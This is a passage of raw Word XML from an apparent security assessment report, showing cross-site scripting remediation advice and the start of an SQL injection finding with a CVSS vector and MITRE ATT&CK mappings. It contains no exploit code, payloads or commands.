        <w:t xml:space="preserve"> all user input on the server with a whitelist </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="184FD757">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>if applicable</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="42834ECA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Always encode output and never store raw HTML or JavaScript from untrusted user input without sanitization.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="259BF1FD" w:rsidP="0D325B6E" w:rsidRDefault="259BF1FD" w14:paraId="290486F9" w14:textId="68648A82">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>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9BF1FD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Implement a Web Application Firewall</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 xml:space="preserve"> to block malicious </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Java</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="659E0784">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cript</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7644150D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> payloads. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1E643EDA" w:rsidP="0D325B6E" w:rsidRDefault="1E643EDA" w14:paraId="7A3FFCFB" w14:textId="6D2C5F5E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>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 xml:space="preserve">Utilize a strict Content Security Policy to restrict </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J</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ava</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="06895241">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cript</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1E643EDA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> sources.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="25223651" w:rsidP="0D325B6E" w:rsidRDefault="25223651" w14:paraId="4497907A" w14:textId="78158695">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="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 xml:space="preserve">Mark session cookie </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="48A6A9BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>configurations such</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 xml:space="preserve"> as </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="25223651">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HttpOnly</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5223651">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Secure</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25223651">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SameSite</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="25223651">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=Strict</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ct cookies f</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25223651">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>om exfiltration.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="07352EAF" w14:textId="733E5FFE">
      <w:pPr>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C52F381" w:rsidP="0D325B6E" w:rsidRDefault="3C52F381" w14:paraId="67761B21" w14:textId="0C5F3EE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52F38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4A85999" w:rsidP="0D325B6E" w:rsidRDefault="54A85999" w14:paraId="1B8C3792" w14:textId="3D39B94E">
      <w:pPr>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="R33ff0c2e236e4bee">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="54A85999">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
          </w:rPr>
          <w:t>Mozilla - Secure Cookie Configurations</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="4D5C4D51" w:rsidP="0D325B6E" w:rsidRDefault="4D5C4D51" w14:paraId="64DEDCBF" w14:textId="5436B30E">
      <w:pPr>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="Rcb2dad3636b74ac6">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="4D5C4D51">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
          </w:rPr>
          <w:t>Portswigger - Cross Site Scripting Prevention</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="0D1B1F1D" w14:textId="3A8A703D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="4950807B" w14:textId="43DAB894">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="73F15B2B" w:rsidP="0D325B6E" w:rsidRDefault="73F15B2B" w14:paraId="7EB2197C" w14:textId="293E7B31">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282095541" w:id="1895578410"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="73F15B2B">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>▌</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="73F15B2B">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>H1:</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="73F15B2B">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc345306827" w:id="767604425"/>
      <w:bookmarkStart w:name="_Toc1777495808" w:id="1835111903"/>
      <w:bookmarkStart w:name="_Toc280493572" w:id="1400413117"/>
      <w:bookmarkStart w:name="_Toc753537269" w:id="127913347"/>
      <w:bookmarkStart w:name="_Toc869944294" w:id="253126080"/>
      <w:bookmarkStart w:name="_Toc256740716" w:id="408706712"/>
      <w:bookmarkStart w:name="_Toc1656662580" w:id="1045274909"/>
      <w:bookmarkStart w:name="_Toc1606660689" w:id="1802376563"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="55C3351E">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQL Injection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="408706712"/>
      <w:bookmarkEnd w:id="1045274909"/>
      <w:bookmarkEnd w:id="1802376563"/>
      <w:bookmarkEnd w:id="767604425"/>
      <w:bookmarkEnd w:id="1835111903"/>
      <w:bookmarkEnd w:id="1400413117"/>
      <w:bookmarkEnd w:id="127913347"/>
      <w:bookmarkEnd w:id="253126080"/>
      <w:bookmarkEnd w:id="189557841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1"/>
        <w:gridCol w:w="1591"/>
        <w:gridCol w:w="2490"/>
        <w:gridCol w:w="4335"/>
      </w:tblGrid>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="7C5626CD">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8C1775B" w14:textId="748B9F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484BC9" w14:textId="280C295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43E87D6" w14:textId="5D16081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71322DB5">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F547FB7" w14:textId="78904DC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CEB545F" w14:textId="02CD7B1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8F1FDAE" w14:textId="6578FDAC">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8.</w:t>
            </w:r>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="42E1C41C">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:caps w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="60"/>
                <w:szCs w:val="60"/>
              </w:rPr>
              <w:t>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69D1097" w14:textId="783E0567">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706CAF2F">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57CF9B" w14:textId="15BE6BE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A5D1A61" w14:textId="69A6E32A">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A4BBEB5"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4335" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:sz="0"/>
              <w:left w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
              <w:bottom w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
              <w:right w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
            </w:tcBorders>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6D392942"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="50507864">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CFA1A17" w14:textId="46F9B8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9FA6E13" w:rsidP="0D325B6E" w:rsidRDefault="19FA6E13" w14:paraId="18B22339" w14:textId="0FE504F8">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:caps w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:L/SC:N/SI:N/SA:N" r:id="R434496b3c23c4f8f">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="19FA6E13">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:caps w:val="0"/>
                  <w:smallCaps w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                </w:rPr>
                <w:t>AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:L/SC:N/SI:N/SA:N</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="58E651AF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1591"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8E6DB6" w14:textId="0DAC1F2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24CFE88" w:rsidP="0D325B6E" w:rsidRDefault="724CFE88" w14:paraId="54E8B054" w14:textId="2F9CEDC8">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidR="724CFE88">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C582CD4" w:rsidP="0D325B6E" w:rsidRDefault="2C582CD4" w14:paraId="1A2C3493" w14:textId="5025C3A1">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="0070C0"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R8974cda6fa8c453f">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="2C582CD4">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>T1005: Data from Local System</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="3F439A6F" w:rsidP="0D325B6E" w:rsidRDefault="3F439A6F" w14:paraId="6FB141E7" w14:textId="3D8FC7F5">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="Raa85626f59044097">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="3F439A6F">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>T1</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="3F439A6F">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>213: Data from Information Repositories</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="3728C065">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1591"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FBF271F"/>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413E14A" w:rsidP="0D325B6E" w:rsidRDefault="7413E14A" w14:paraId="74412B59" w14:textId="7E636C06">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidR="7413E14A">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235DA6F" w:rsidP="0D325B6E" w:rsidRDefault="5235DA6F" w14:paraId="7BE033BE" w14:textId="4FF965A0">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="Rad212c74d5884bae">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="5235DA6F">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="5235DA6F">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>1048: Application Isolation and Sandboxing</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="4E17379B" w:rsidP="0D325B6E" w:rsidRDefault="4E17379B" w14:paraId="5E48BF15" w14:textId="2CDFE3B6">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R31e0b4c0a006481d">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="4E17379B">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t xml:space="preserve">M0818: </w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="4E17379B">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Validate</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="4E17379B">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t xml:space="preserve"> Prog</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="4E17379B">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ram Inputs</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="01B6948A">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426414" w14:textId="31749C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62821F0" w14:textId="0879A465">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:caps w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="6E6298DC" w14:textId="402C0FB7">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="55C3351E" w:rsidP="0D325B6E" w:rsidRDefault="55C3351E" w14:paraId="23FF0B79" w14:textId="190FE15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5C3351E" w:rsidP="0D325B6E" w:rsidRDefault="55C3351E" w14:paraId="2A36F879" w14:textId="6BBB459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parameter on the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is vulnerable to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based SQL injection. This can be used to access the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database stored on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machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="3BB35A50" w14:textId="036173E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5C3351E" w:rsidP="0D325B6E" w:rsidRDefault="55C3351E" w14:paraId="63023EEA" w14:textId="7B2E81D5">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55C3351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5C3351E" w:rsidP="0D325B6E" w:rsidRDefault="55C3351E" w14:paraId="31AA5078" w14:textId="5A4DDAFE">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:after="0"/>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adversary to have the ability to </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the SQL statement to view the contents of any entry across the entire database, including in other tables. This could potentially allow access to confidential user data such as </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="44793025">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usernames,</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="386445C2">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w:t>
      </w:r>
